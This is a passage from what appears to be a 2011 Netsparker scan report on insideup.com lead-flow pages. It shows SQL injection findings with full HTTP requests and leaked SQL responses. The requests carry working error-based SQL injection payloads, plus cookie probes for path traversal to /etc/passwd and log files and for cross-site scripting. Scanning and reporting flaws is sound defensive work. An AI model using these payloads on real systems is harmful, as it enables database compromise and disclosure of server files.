lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f84fgck871o47vr7vhekf3l3l3; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
[Probable] SQL Injection

23 TOTAL
CRITICAL
SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability, and its successful exploitation can have critical implications. Although Netsparker believes there is a SQL Injection here, it could not confirm it; there can be numerous reasons why Netsparker is unable to confirm an issue. We strongly recommend investigating the issue manually to ensure that it is a SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, so that we can address it next time and give you a more precise result.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, updating and deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, updating and deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. At a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object-relational mapping). Most ORM systems use parameterized queries, and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review web logs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries built with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f0g3u77cjctk0d190gr5kae692; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 